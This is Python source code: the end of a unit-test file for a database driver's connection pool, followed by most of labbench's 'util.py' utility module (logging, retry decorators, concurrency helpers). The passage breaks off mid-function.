Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False) session.cluster.connection_factory.return_value = conn pool = HostConnectionPool(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.address) pool.borrow_connection(timeout=0.01) conn.is_defunct = True host.monitor.signal_connection_failure.return_value = False pool.return_connection(conn) # the connection should be closed a new creation scheduled conn.close.assert_called_once() session.submit.assert_called_once() self.assertFalse(pool.is_shutdown) def test_return_defunct_connection_on_down_host(self): host = Mock(spec=Host, address='ip1') host.monitor = Mock(spec=HealthMonitor) session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False) session.cluster.connection_factory.return_value = conn pool = HostConnectionPool(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.address) pool.borrow_connection(timeout=0.01) conn.is_defunct = True host.monitor.signal_connection_failure.return_value = True pool.return_connection(conn) # the connection should be closed a new creation scheduled host.monitor.signal_connection_failure.assert_called_once() conn.close.assert_called_once() self.assertFalse(session.submit.called) self.assertTrue(pool.is_shutdown) def test_return_closed_connection(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=True) session.cluster.connection_factory.return_value = conn pool = HostConnectionPool(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.address) pool.borrow_connection(timeout=0.01) conn.is_closed = True host.monitor.signal_connection_failure.return_value = False pool.return_connection(conn) # a new creation should be scheduled session.submit.assert_called_once() self.assertFalse(pool.is_shutdown)
util.py
# This software was developed by employees of the National Institute of # Standards and Technology (NIST), an agency of the Federal Government. # Pursuant to title 17 United States Code Section 105, works of NIST employees # are not subject to copyright protection in the United States and are # considered to be in the public domain. Permission to freely use, copy, # modify, and distribute this software and its documentation without fee is # hereby granted, provided that this notice and disclaimer of warranty appears # in all copies. # # THE SOFTWARE IS PROVIDED 'AS IS' WITHOUT ANY WARRANTY OF ANY KIND, EITHER # EXPRESSED, IMPLIED, OR STATUTORY, INCLUDING, BUT NOT LIMITED TO, ANY WARRANTY # THAT THE SOFTWARE WILL CONFORM TO SPECIFICATIONS, ANY IMPLIED WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND FREEDOM FROM # INFRINGEMENT, AND ANY WARRANTY THAT THE DOCUMENTATION WILL CONFORM TO THE # SOFTWARE, OR ANY WARRANTY THAT THE SOFTWARE WILL BE ERROR FREE. IN NO EVENT # SHALL NIST BE LIABLE FOR ANY DAMAGES, INCLUDING, BUT NOT LIMITED TO, DIRECT, # INDIRECT, SPECIAL OR CONSEQUENTIAL DAMAGES, ARISING OUT OF, RESULTING FROM, # OR IN ANY WAY CONNECTED WITH THIS SOFTWARE, WHETHER OR NOT BASED UPON # WARRANTY, CONTRACT, TORT, OR OTHERWISE, WHETHER OR NOT INJURY WAS SUSTAINED # BY PERSONS OR PROPERTY OR OTHERWISE, AND WHETHER OR NOT LOSS WAS SUSTAINED # FROM, OR AROSE OUT OF THE RESULTS OF, OR USE OF, THE SOFTWARE OR SERVICES # PROVIDED HEREUNDER. Distributions of NIST software should also include # copyright and licensing statements of any third-party software that are # legally bundled with the code in compliance with the conditions of those # licenses. __all__ = [ # "misc" "ConfigStore", "hash_caller", "kill_by_name", "show_messages", "logger", "LabbenchDeprecationWarning", "import_t0", # concurrency and sequencing "concurrently", "sequentially", "Call", "ConcurrentException", "check_hanging_thread", "ThreadSandbox", "ThreadEndedByMaster", # timing and flow management "retry", "until_timeout", "sleep", "stopwatch", "timeout_iter" # wrapper helpers "copy_func", # traceback scrubbing "hide_in_traceback", "_force_full_traceback", # helper objects "Ownable", ] from contextlib import contextmanager, _GeneratorContextManager from functools import wraps from queue import Queue, Empty from threading import Thread, ThreadError, Event from typing import Callable import builtins import hashlib import inspect import logging import psutil import sys import time import traceback from warnings import simplefilter import_t0 = time.perf_counter() logger = logging.LoggerAdapter( logging.getLogger("labbench"), dict( label="labbench" ), # description of origin within labbench (for screen logs only) ) # show deprecation warnings only once class LabbenchDeprecationWarning(DeprecationWarning): pass simplefilter("once", LabbenchDeprecationWarning) import weakref def show_messages(minimum_level, colors=True): """Configure screen debug message output for any messages as least as important as indicated by `level`. Arguments: minimum_level: One of 'debug', 'warning', 'error', or None. If None, there will be no output. Returns: None """ import logging err_map = { "debug": logging.DEBUG, "warning": logging.WARNING, "error": logging.ERROR, "info": logging.INFO, None: None, } if minimum_level not in err_map and not isinstance(minimum_level, int): raise ValueError( f"message level must be a flag {tuple(err_map.keys())} or an integer, not {repr(minimum_level)}" ) level = ( err_map[minimum_level.lower()] if isinstance(minimum_level, str) else minimum_level ) logger.setLevel(level) # Clear out any stale handlers if hasattr(logger, "_screen_handler"): logger.logger.removeHandler(logger._screen_handler) if level is None: return logger._screen_handler = logging.StreamHandler() logger._screen_handler.setLevel(level) # - %(pathname)s:%(lineno)d' if colors: from coloredlogs import ColoredFormatter, DEFAULT_FIELD_STYLES log_fmt = "{levelname:^7s} {asctime}.{msecs:03.0f} • {label}: {message}" styles = dict(DEFAULT_FIELD_STYLES, label=dict(color="blue"),) formatter = ColoredFormatter(log_fmt, style="{", field_styles=styles) else: log_fmt = "{levelname:^7s} {asctime}.{msecs:03.0f} • {label}: {message}" formatter = logging.Formatter(log_fmt, style="{") logger._screen_handler.setFormatter(formatter) logger.logger.addHandler(logger._screen_handler) show_messages("info") def _inject_logger_metadata(obj): d = dict( object=repr(obj), origin=type(obj).__qualname__, owned_name=obj._owned_name, ) if d["owned_name"] is not None: d["label"] = d["owned_name"] elif repr(obj) == object.__repr__(obj): d["label"] = type(obj).__qualname__ + "(...)" else: txt = repr(obj) if len(txt) > 20: txt = txt[:-1].split(",")[0] + ")" d["label"] = txt return d def callable_logger(func): if isinstance(getattr(func, "__self__", None), Ownable): return func.__self__._logger else: return logger class Ownable: """Subclass to pull in name from an owning class.""" __objclass__ = None _owned_name = None _logger = logger def __init__(self): self._logger = logging.LoggerAdapter( logger.logger, extra=_inject_logger_metadata(self), ) def __set_name__(self, owner_cls, name): self.__objclass__ = owner_cls self.__name__ = name def __get__(self, owner, owner_cls=None): return self def __owner_init__(self, owner): """called on instantiation of the owner (again for its parent owner)""" if owner._owned_name is None: self._owned_name = self.__name__ else: self._owned_name = owner._owned_name + "." + self.__name__ self._logger.extra.update(**_inject_logger_metadata(self)) def __owner_subclass__(self, owner_cls): """Called after the owner class is instantiated; returns an object to be used in the Rack namespace""" # TODO: revisit whether there should be any assignment of _owned_name here if self._owned_name is None: self._owned_name = self.__name__ return self def __repr__(self): if self.__objclass__ is not None: cls = type(self) ownercls = self.__objclass__ typename = cls.__module__ + "." + cls.__name__ ownedname = ownercls.__qualname__ return f"<{typename} object at {hex(id(self))} bound to {ownedname} class at {hex(id(ownercls))}>" else: return object.__repr__(self) def __str__(self): return self._owned_name or repr(self) class ConcurrentException(Exception): """Raised on concurrency errors in `labbench.concurrently`""" thread_exceptions = [] class OwnerThreadException(ThreadError): """Raised to encapsulate a thread raised by the owning thread during calls to `labbench.concurrently`""" class ThreadEndedByMaster(ThreadError): """Raised in a thread to indicate the owning thread requested termination""" concurrency_count = 0 stop_request_event = Event() sys._debug_tb = False import types TRACEBACK_HIDE_TAG = "🦙 hide from traceback 🦙" def hide_in_traceback(func): def adjust(f): code = f.__code__ if tuple(sys.version_info)[:2] >= (3, 8): f.__code__ = code.replace(co_consts=code.co_consts + (TRACEBACK_HIDE_TAG,)) else: # python < 3.8 f.__code__ = types.CodeType( code.co_argcount, code.co_kwonlyargcount, code.co_nlocals, code.co_stacksize, code.co_flags, code.co_code, code.co_consts + (TRACEBACK_HIDE_TAG,), code.co_names, code.co_varnames, code.co_filename, code.co_name, code.co_firstlineno, code.co_lnotab, code.co_freevars, code.co_cellvars, ) if not callable(func): raise TypeError(f"{func} is not callable") if hasattr(func, "__code__"): adjust(func) if hasattr(func.__call__, "__code__"): adjust(func.__call__) return func def _force_full_traceback(force: bool): sys._debug_tb = force class _filtered_exc_info: """a monkeypatch for sys.exc_info that removes functions from tracebacks that are tagged with TRACEBACK_HIDE_TAG """ def __init__(self, wrapped): self.lb_wrapped = wrapped def __call__(self): try: etype, evalue, start_tb = self.lb_wrapped() if sys._debug_tb: return etype, evalue, start_tb tb = prev_tb = start_tb # step through the stack traces while tb is not None: if TRACEBACK_HIDE_TAG in tb.tb_frame.f_code.co_consts: # when the tag is present, change the previous tb_next to skip this tb if tb is start_tb: start_tb = start_tb.tb_next else: prev_tb.tb_next = tb.tb_next # on to the next traceback prev_tb, tb = tb, tb.tb_next return etype, evalue, start_tb except BaseException as e: raise def copy_func( func, assigned=("__module__", "__name__", "__qualname__", "__doc__", "__annotations__"), updated=("__dict__",), ) -> callable: """returns a copy of func with specified attributes (following the inspect.wraps arguments). This is similar to wrapping `func` with `lambda *args, **kws: func(*args, **kws)`, except the returned callable contains a duplicate of the bytecode in `func`. The idea that the returned copy has fresh to __doc__, __signature__, etc., which can be changed without independently of `func`. """ new = types.FunctionType( func.__code__, func.__globals__, func.__name__, func.__defaults__, func.__closure__, ) for attr in assigned: setattr(new, attr, getattr(func, attr)) for attr in updated: getattr(new, attr).update(getattr(func, attr)) return new # TODO: remove this def withsignature( cls, name: str, fields: list, defaults: dict, positional: int = None, annotations: dict = {}, ): """Replace cls.__init__ with a wrapper function with an explicit call signature, replacing the actual call signature that can be dynamic __init__(self, *args, **kws) call signature. :fields: iterable of names of each call signature argument : """ # Is the existing cls.__init__ already a __init__ wrapper? wrapped = getattr(cls, name) orig_doc = getattr(wrapped, "__origdoc__", cls.__init__.__doc__) reuse = hasattr(wrapped, "__dynamic__") defaults = tuple(defaults.items()) if positional is None: positional = len(fields) # Generate a code object with the adjusted signature code = wrapper.__code__ if tuple(sys.version_info)[:2] >= (3, 8): # there is a new co_posonlyargs argument since 3.8 - use the new .replace # to be less brittle to future signature changes code = code.replace( co_argcount=1 + positional, # to include self co_posonlyargcount=0, co_kwonlyargcount=len(fields) - positional, co_nlocals=len(fields) + 1, # to include self co_varnames=("self",) + tuple(fields), ) else: code = types.CodeType( 1 + positional, # co_argcount len(fields) - positional, # co_kwonlyargcount len(fields) + 1, # co_nlocals code.co_stacksize, code.co_flags, code.co_code, code.co_consts, code.co_names, ("self",) + tuple(fields), # co_varnames code.co_filename, code.co_name, code.co_firstlineno, code.co_lnotab, code.co_freevars, code.co_cellvars, ) # Generate the new wrapper function and its signature __globals__ = getattr(wrapped, "__globals__", builtins.__dict__) import functools wrapper = types.FunctionType(code, __globals__, wrapped.__name__) wrapper.__doc__ = wrapped.__doc__ wrapper.__qualname__ = wrapped.__qualname__ wrapper.__defaults__ = tuple((v for k, v in defaults[:positional])) wrapper.__kwdefaults__ = {k: v for k, v in defaults[positional:]} wrapper.__annotations__ = annotations wrapper.__dynamic__ = True if not reuse: setattr(cls, name + "_wrapped", wrapped) setattr(cls, name, wrapper) wrapper.__doc__ = wrapper.__origdoc__ = orig_doc if not hasattr(sys.exc_info, "lb_wrapped"): # monkeypatch sys.exc_info if it needs sys.exc_info, exc_info = _filtered_exc_info(sys.exc_info), sys.exc_info def sleep(seconds, tick=1.0): """Drop-in replacement for time.sleep that raises ConcurrentException if another thread requests that all threads stop. """ t0 = time.time() global stop_request_event remaining = 0 while True: # Raise ConcurrentException if the stop_request_event is set if stop_request_event.wait(min(remaining, tick)): raise ThreadEndedByMaster remaining = seconds - (time.time() - t0) # Return normally if the sleep finishes as requested if remaining <= 0: return def check_hanging_thread(): """Raise ThreadEndedByMaster if the process has requested this thread to end. """ sleep(0.0) @hide_in_traceback def retry( exception_or_exceptions, tries=4, delay=0, backoff=0, exception_func=lambda: None ): """This decorator causes the function call to repeat, suppressing specified exception(s), until a maximum number of retries has been attempted. - If the function raises the exception the specified number of times, the underlying exception is raised. - Otherwise, return the result of the function call. :example: The following retries the telnet connection 5 times on ConnectionRefusedError:: import telnetlib # Retry a telnet connection 5 times if the telnet library raises ConnectionRefusedError @retry(ConnectionRefusedError, tries=5) def open(host, port): t = telnetlib.Telnet() t.open(host,port,5) return t Inspired by https://github.com/saltycrane/retry-decorator which is released under the BSD license. Arguments: exception_or_exceptions: Exception (sub)class (or tuple of exception classes) to watch for tries: number of times to try before giving up :type tries: int delay: initial delay between retries in seconds :type delay: float backoff: backoff to multiply to the delay for each retry :type backoff: float exception_func: function to call on exception before the next retry :type exception_func: callable """ def decorator(f): @wraps(f) @hide_in_traceback def do_retry(*args, **kwargs): notified = False active_delay = delay for retry in range(tries): try: ret = f(*args, **kwargs) except exception_or_exceptions as e: if not notified: etype = type(e).__qualname__ msg = ( f"caught '{etype}' on first call to '{f.__name__}' - repeating the call " f"{tries-1} more times or until no exception is raised" ) callable_logger(f).info(msg) notified = True ex = e exception_func() sleep(active_delay) active_delay = active_delay * backoff else: break else: raise ex return ret return do_retry return decorator @hide_in_traceback def until_timeout( exception_or_exceptions, timeout, delay=0, backoff=0, exception_func=lambda: None ): """This decorator causes the function call to repeat, suppressing specified exception(s), until the specified timeout period has expired. - If the timeout expires, the underlying exception is raised. - Otherwise, return the result of the function call. Inspired by https://github.com/saltycrane/retry-decorator which is released under the BSD license. :example: The following retries the telnet connection for 5 seconds on ConnectionRefusedError:: import telnetlib @until_timeout(ConnectionRefusedError, 5) def open(host, port): t = telnetlib.Telnet() t.open(host,port,5) return t Arguments: exception_or_exceptions: Exception (sub)class (or tuple of exception classes) to watch for timeout: time in seconds to continue calling the decorated function while suppressing exception_or_exceptions :type timeout: float delay: initial delay between retries in seconds :type delay: float backoff: backoff to multiply to the delay for each retry :type backoff: float exception_func: function to call on exception before the next retry :type exception_func: callable """ def decorator(f): @wraps(f) @hide_in_traceback def do_retry(*args, **kwargs): notified = False active_delay = delay t0 = time.time() while time.time() - t0 < timeout: try: ret = f(*args, **kwargs) except exception_or_exceptions as e: progress = time.time() - t0 if not notified and timeout - progress > 0: etype = type(e).__qualname__ msg = ( f"caught '{etype}' in first call to '{f.__name__}' - repeating calls for " f"another {timeout-progress:0.3f}s, or until no exception is raised" ) callable_logger(f).info(msg) notified = True ex = e exception_func() sleep(active_delay) active_delay = active_delay * backoff else: break else: raise ex return ret return do_retry return decorator def timeout_iter(duration): """sets a timer for `duration` seconds, yields time elapsed as long as timeout has not been reached""" t0 = time.perf_counter() elapsed = 0 while elapsed < duration: yield elapsed elapsed = time.perf_counter() - t0 def kill_by_name(*names): """Kill one or more running processes by the name(s) of matching binaries. Arguments: names: list of names of processes to kill :type names: str :example: >>> # Kill any binaries called 'notepad.exe' or 'notepad2.exe' >>> kill_by_name('notepad.exe', 'notepad2.exe') :Notes: Looks for a case-insensitive match against the Process.name() in the psutil library. Though psutil is cross-platform, the naming convention returned by name() is platform-dependent. In windows, for example, name() usually ends in '.exe'. """ for pid in psutil.pids(): try: proc = psutil.Process(pid) for target in names: if proc.name().lower() == target.lower(): logger.info(f"killing process {proc.name()}") proc.kill() except psutil.NoSuchProcess: continue def hash_caller(call_depth=1): """Use introspection to return an SHA224 hex digest of the caller, which is almost certainly unique to the combination of the caller source code and the arguments passed it. """ import inspect import pickle thisframe = inspect.currentframe() frame = inspect.getouterframes(thisframe)[call_depth] arginfo = inspect.getargvalues(frame.frame) # get the function object for a simple function if frame.function in frame.frame.f_globals: func = frame.frame.f_globals[frame.function] argnames = arginfo.args # get the function object for a method in a class elif len(arginfo.args) > 0: # arginfo.args[0] == 'self': name = arginfo.args[0] if name not in frame.frame.f_locals: raise ValueError("failed to find function object by introspection") func = getattr(frame.frame.f_locals[name], frame.function) argnames = arginfo.args[1:] # there weren't any arguments else: argnames = [] args = [arginfo.locals[k] for k in argnames] s = inspect.getsource(func) + str(pickle.dumps(args)) return hashlib.sha224(s.encode("ascii")).hexdigest() @contextmanager def stopwatch(desc: str = "", threshold: float = 0): """Time a block of code using a with statement like this: >>> with stopwatch('sleep statement'): >>> time.sleep(2) sleep statement time elapsed 1.999s. Arguments: desc: text for display that describes the event being timed threshold: only show timing if at least this much time (in s) elapsed : Returns: context manager """ t0 = time.perf_counter() try: yield finally: elapsed = time.perf_counter() - t0 if elapsed >= threshold: msg = str(desc) + " " if len(desc) else "" msg += f"{elapsed:0.3f} s elapsed" exc_info = sys.exc_info() if exc_info != (None, None, None): msg += f" before exception {exc_info[1]}" logger.info(msg.lstrip()) class Call(object): """Wrap a function to apply arguments for threaded calls to `concurrently`. This can be passed in directly by a user in order to provide arguments; otherwise, it will automatically be wrapped inside `concurrently` to keep track of some call metadata during execution. """ def __init__(self, func, *args, **kws): if not callable(func): raise ValueError("`func` argument is not callable") self.func = func self.name = self.func.__name__ self.args = args self.kws = kws self.queue = None def __repr__(self): args = ",".join( [repr(v) for v in self.args] + [(k + "=" + repr(v)) for k, v in self.kws.items()] ) qualname = self.func.__module__ + "." + self.func.__qualname__ return f"Call({qualname},{args})" @hide_in_traceback def __call__(self): try: self.result = self.func(*self.args, **self.kws) except BaseException: self.result = None self.traceback = sys.exc_info() else: self.traceback = None if self.queue is not None: self.queue.put(self) else: return self.result def set_queue(self, queue): """Set the queue object used to communicate between threads""" self.queue = queue @classmethod def wrap_list_to_dict(cls, name_func_pairs): """adjusts naming and wraps callables with Call""" ret = {} # First, generate the list of callables for name, func in name_func_pairs: try: if name is None: if hasattr(func, "name"): name = func.name elif hasattr(func, "__name__"): name = func.__name__ else: raise TypeError(f"could not find name of {func}") if not isinstance(func, cls): func = cls(func) func.name = name if name in ret: msg = ( f"another callable is already named {repr(name)} - " "pass as a keyword argument to specify a different name" ) raise KeyError(msg) ret[name] = func except: raise return ret class MultipleContexts: """Handle opening multiple contexts in a single `with` block. This is a threadsafe implementation that accepts a handler function that may implement any desired any desired type of concurrency in entering each context. The handler is responsible for sequencing the calls that enter each context. In the event of an exception, `MultipleContexts` calls the __exit__ condition of each context that has already been entered. In the current implementation, __exit__ calls are made sequentially (not through call_handler), in the reversed order that each context __enter__ was called. """ def __init__( self, call_handler: Callable[[dict, list, dict], dict], params: dict, objs: list ): """ call_handler: one of `sequentially_call` or `concurrently_call` params: a dictionary of operating parameters (see `concurrently`) objs: a list of contexts to be entered and dict-like objects to return Returns: context object for use in a `with` statement """ # enter = self.enter # def wrapped_enter(name, context): # return enter(name, context) # wrapped_enter.__name__ = 'MultipleContexts_enter_' + hex(id(self)+id(call_handler)) def name(o): return self.abort = False self._entered = {} self.__name__ = "__enter__" # make up names for the __enter__ objects self.objs = [(f"enter_{type(o).__name__}_{hex(id(o))}", o) for _, o in objs] self.params = params self.call_handler = call_handler self.exc = {} @hide_in_traceback def enter(self, name, context): """ enter! """ if not self.abort: # proceed only if there have been no exceptions try: context.__enter__() # start of a context entry thread except: self.abort = True self.exc[name] = sys.exc_info() raise else: self._entered[name] = context @hide_in_traceback def __enter__(self): calls = [(name, Call(self.enter, name, obj)) for name, obj in self.objs] try: with stopwatch(f"entry into context for {self.params['name']}", 0.5): self.call_handler(self.params, calls) except BaseException as e: try: self.__exit__(None, None, None) # exit any open contexts before raise finally: raise e @hide_in_traceback def __exit__(self, *exc): with stopwatch(f"{self.params['name']} - context exit", 0.5): for name in tuple(self._entered.keys())[::-1]: context = self._entered[name] if name in self.exc: continue try: context.__exit__(None, None, None) except: exc = sys.exc_info() traceback.print_exc() # don't overwrite the original exception, if there was one self.exc.setdefault(name, exc) contexts = dict(self.objs) for name, exc in self.exc.items(): if name in contexts and name not in self._entered: try: contexts[name].__exit__(None, None, None) except BaseException as e: if e is not self.exc[name][1]: msg = ( f"{name}.__exit__ raised {e} in cleanup attempt after another " f"exception in {name}.__enter__" ) log_obj = callable_logger(contexts[name].__exit__) log_obj.warning(msg) if len(self.exc) == 1: exc_info = list(self.exc.values())[0] raise exc_info[1] elif len(self.exc) > 1: ex = ConcurrentException( f"exceptions raised in {len(self.exc)} contexts are printed inline" ) ex.thread_exceptions = self.exc raise ex if exc != (None, None, None): # sys.exc_info() may have been # changed by one of the exit methods # so provide explicit exception info for h in logger.logger.handlers: h.flush() raise exc[1] RUNNERS = { (False, False): None, (False, True): "context", (True, False): "callable", (True, True): "both", } DIR_DICT = set(dir(dict)) def isdictducktype(cls): return set(dir(cls)).issuperset(DIR_DICT) @hide_in_traceback def enter_or_call(flexible_caller, objs, kws): """Extract value traits from the keyword arguments flags, decide whether `objs` and `kws` should be treated as context managers or callables, and then either enter the contexts or call the callables. """ objs = list(objs) # Treat keyword arguments passed as callables should be left as callables; # otherwise, override the parameter params = dict( catch=False, nones=False, traceback_delay=False, flatten=True, name=None ) def merge_inputs(dicts: list, candidates: list): """Merge nested returns and check for return data key conflicts in the callable """ ret = {} for name, d in dicts: common = set(ret.keys()).difference(d.keys()) if len(common) > 0: which = ", ".join(common) msg = f"attempting to merge results and dict arguments, but the key names ({which}) conflict in nested calls" raise KeyError(msg) ret.update(d) conflicts = set(ret.keys()).intersection([n for (n, obj) in candidates]) if len(conflicts) > 0: raise KeyError("keys of conflict in nested return dictionary keys with ") return ret def merge_results(inputs, result): for k, v in dict(result).items(): if isdictducktype(v.__class__): conflicts = set(v.keys()).intersection(start_keys) if len(conflicts) > 0: conflicts = ",".join(conflicts) raise KeyError( f"conflicts in keys ({conflicts}) when merging return dictionaries" ) inputs.update(result.pop(k)) # Pull parameters from the passed keywords for name in params.keys(): if name in kws and not callable(kws[name]): params[name] = kws.pop(name) if params["name"] is None: # come up with a gobbledigook name that is at least unique frame = inspect.currentframe().f_back.f_back params[ "name" ] = f"<{frame.f_code.co_filename}:{frame.f_code.co_firstlineno} call 0x{hashlib.md5().hexdigest()}>" # Combine the position and keyword arguments, and assign labels allobjs = list(objs) + list(kws.values()) names = (len(objs) * [None]) + list(kws.keys()) candidates = list(zip(names, allobjs)) del allobjs, names dicts = [] # Make sure candidates are either (1) all context managers # or (2) all callables. Decide what type of operation to proceed with. runner = None for i, (k, obj) in enumerate(candidates): # pass through dictionary objects from nested calls if isdictducktype(obj.__class__): dicts.append(candidates.pop(i)) continue thisone = RUNNERS[ ( callable(obj) and not isinstance(obj, _GeneratorContextManager) ), # Is it callable? ( hasattr(obj, "__enter__") or isinstance(obj, _GeneratorContextManager) ), # Is it a context manager? ] if thisone is None: msg = f"each argument must be a callable and/or a context manager, " if k is None: msg += f"but given {repr(obj)}" else: msg += f"but given {k}={repr(obj)}" raise TypeError(msg) elif runner in (None, "both"): runner = thisone else: if thisone not in (runner, "both"): raise TypeError( f"cannot run a mixture of context managers and callables" ) # Enforce uniqueness in the (callable or context manager) object candidate_objs = [c[1] for c in candidates] if len(set(candidate_objs)) != len(candidate_objs): raise ValueError("each callable and context manager must be unique") if runner is None: return {} elif runner == "both": raise TypeError( "all objects supported both calling and context management - not sure which to run" ) elif runner == "context": if len(dicts) > 0: raise ValueError( f"unexpected return value dictionary argument for context management {dicts}" ) return MultipleContexts(flexible_caller, params, candidates) else: ret = merge_inputs(dicts, candidates) result = flexible_caller(params, candidates) start_keys = set(ret.keys()).union(result.keys()) if params["flatten"]: merge_results(ret, result) ret.update(result) return ret @hide_in_traceback def concurrently_call(params: dict, name_func_pairs: list) -> dict: global concurrency_count def traceback_skip(exc_tuple, count): """Skip the first `count` traceback entries in an exception. """ tb = exc_tuple[2] for i in range(count): if tb is not None and tb.tb_next is not None: tb = tb.tb_next return exc_tuple[:2] + (tb,) def check_thread_support(func_in): """Setup threading (concurrent execution only), including checks for whether a Device instance indicates it supports concurrent execution or not. """ func = func_in.func if isinstance(func_in, Call) else func_in if hasattr(func, "__self__") and not getattr( func.__self__, "concurrency", True ): # is this a Device that does not support concurrency? raise ConcurrentException(f"{func.__self__} does not support concurrency") return func_in stop_request_event.clear() results = {} catch = params["catch"] traceback_delay = params["traceback_delay"] # Setup calls then funcs # Set up mappings between wrappers, threads, and the function to call wrappers = Call.wrap_list_to_dict(name_func_pairs) threads = {name: Thread(target=w, name=name) for name, w in wrappers.items()} # Start threads with calls to each function finished = Queue() for name, thread in list(threads.items()): wrappers[name].set_queue(finished) thread.start() concurrency_count += 1 # As each thread ends, collect the return value and any exceptions tracebacks = [] parent_exception = None t0 = time.perf_counter() while len(threads) > 0: try: called = finished.get(timeout=0.25) except Empty: if time.perf_counter() - t0 > 60 * 15: names = ",".join(list(threads.keys())) logger.debug(f"{names} threads are still running") t0 = time.perf_counter() continue except BaseException as e: parent_exception = e stop_request_event.set() called = None if called is None: continue # Below only happens when called is not none if parent_exception is not None: names = ", ".join(list(threads.keys())) logger.error( f"raising {parent_exception.__class__.__name__} in main thread after child threads {names} return" ) # if there was an exception that wasn't us ending the thread, # show messages if called.traceback is not None: tb = traceback_skip(called.traceback, 1) if called.traceback[0] is not ThreadEndedByMaster: # exception_count += 1 tracebacks.append(tb) last_exception = called.traceback[1] if not traceback_delay: try: traceback.print_exception(*tb) except BaseException as e: sys.stderr.write( "\nthread exception, but failed to print exception" ) sys.stderr.write(str(e)) sys.stderr.write("\n") else: if params["nones"] or called.result is not None: results[called.name] = called.result # Remove this thread from the dictionary of running threads del threads[called.name] concurrency_count -= 1 # Clear the stop request, if there are no other threads that # still need to exit if concurrency_count == 0 and stop_request_event.is_set(): stop_request_event.clear() # Raise exceptions as necessary if parent_exception is not None: for h in logger.logger.handlers: h.flush() for tb in tracebacks: try: traceback.print_exception(*tb) except BaseException: sys.stderr.write("\nthread error (fixme to print message)") sys.stderr.write("\n") raise parent_exception elif len(tracebacks) > 0 and not catch: for h in logger.logger.handlers: h.flush() if len(tracebacks) == 1: raise last_exception else: for tb in tracebacks: try: traceback.print_exception(*tb) except BaseException: sys.stderr.write("\nthread error (fixme to print message)") sys.stderr.write("\n") ex = ConcurrentException(f"{len(tracebacks)} call(s) raised exceptions") ex.thread_exceptions = tracebacks raise ex return results @hide_in_traceback def concurrently(*objs, **kws): r"""If `*objs` are callable (like functions), call each of `*objs` in concurrent threads. If `*objs` are context managers (such as Device instances to be connected), enter each context in concurrent threads. Multiple references to the same function in `objs` only result in one call. The `catch` and `nones` arguments may be callables, in which case they are executed (and each flag value is treated as defaults). Arguments: objs: each argument may be a callable (function or class that defines a __call__ method), or context manager (such as a Device instance) catch: if `False` (the default), a `ConcurrentException` is raised if any of `funcs` raise an exception; otherwise, any remaining successful calls are returned as normal nones: if not callable and evalues as True, includes entries for calls that return None (default is False) flatten: if `True`, results of callables that returns a dictionary are merged into the return dictionary with update (instead of passed through as dictionaries) traceback_delay: if `False`, immediately show traceback information on a thread exception; if `True` (the default), wait until all threads finish Returns: the values returned by each call :rtype: dictionary keyed by function name Here are some examples: :Example: Call each function `myfunc1` and `myfunc2`, each with no arguments: >>> def do_something_1 (): >>> time.sleep(0.5) >>> return 1 >>> def do_something_2 (): >>> time.sleep(1) >>> return 2 >>> rets = concurrent(myfunc1, myfunc2) >>> rets[do_something_1] :Example: To pass arguments, use the Call wrapper >>> def do_something_3 (a,b,c): >>> time.sleep(2) >>> return a,b,c >>> rets = concurrent(myfunc1, Call(myfunc3,a,b,c=c)) >>> rets[do_something_3] a, b, c **Caveats** - Because the calls are in different threads, not different processes, this should be used for IO-bound functions (not CPU-intensive functions). - Be careful about thread safety. When the callable object is a Device method, :func concurrency: checks the Device object state.concurrency for compatibility before execution. If this check returns `False`, this method raises a ConcurrentException. """ return enter_or_call(concurrently_call, objs, kws) @hide_in_traceback def sequentially_call(params: dict, name_func_pairs: list) -> dict: """Emulate `concurrently_call`, with sequential execution. This is mostly only useful to guarantee compatibility with `concurrently_call` dictionary-style returns. """ results = {} wrappers = Call.wrap_list_to_dict(name_func_pairs) # Run each callable for name, wrapper in wrappers.items(): ret = wrapper() if ret is not None or params["nones"]: results[name] = ret return results @hide_in_traceback def sequentially(*objs, **kws): r"""If `*objs` are callable (like functions), call each of `*objs` in the given order. If `*objs` are context managers (such as Device instances to be connected), enter each context in the given order, and return a context manager suited for a `with` statement. This is the sequential implementation of the `concurrently` function, with a compatible convention of returning dictionaries. Multiple references to the same function in `objs` only result in one call. The `nones` argument may be callables in case they are executed (and each flag value is treated as defaults). Arguments: objs: each argument may be a callable (function, or class that defines a __call__ method), or context manager (such as a Device instance) kws: dictionary of further callables or context managers, with names set by the dictionary key nones: if True, include dictionary entries for calls that return None (default is False); left as another entry in `kws` if callable or a context manager flatten: if `True`, results of callables that returns a dictionary are merged into the return dictionary with update (instead of passed through as dictionaries) Returns: a dictionary keyed on the object name containing the return value of each function :rtype: dictionary of keyed by function Here are some examples: :Example: Call each function `myfunc1` and `myfunc2`, each with no arguments: >>> def do_something_1 (): >>> time.sleep(0.5) >>> return 1 >>> def do_something_2 (): >>> time.sleep(1) >>> return 2 >>> rets = concurrent(myfunc1, myfunc2) >>> rets[do_something_1] 1 :Example: To pass arguments, use the Call wrapper >>> def do_something_3 (a,b,c): >>> time.sleep(2) >>> return a,b,c >>> rets = concurrent(myfunc1, Call(myfunc3,a,b,c=c)) >>> rets[do_something_3] a, b, c **Caveats** - Unlike `concurrently`, an exception in a context manager's __enter__ means that any remaining context managers will not be entered. When the callable object is a Device method, :func concurrency: checks the Device object state.concurrency for compatibility before execution. If this check returns `False`, this method raises a ConcurrentException. """ return enter_or_call(sequentially_call, objs, kws) OP_CALL = "op" OP_GET = "get" OP_SET = "set" OP_QUIT = None class ThreadDelegate(object): _sandbox = None _obj = None _dir = None _repr = None def __init__(self, sandbox, obj, dir_, repr_): self._sandbox = sandbox self._obj = obj self._dir = dir_ self._repr = repr_ @hide_in_traceback def __call__(self, *args, **kws): return message(self._sandbox, OP_CALL, self._obj, None, args, kws) def __getattribute__(self, name): if name in delegate_keys: return object.__getattribute__(self, name) else: return message(self._sandbox, OP_GET, self._obj, name, None, None) def __dir__(self): return self._dir def __repr__(self): return 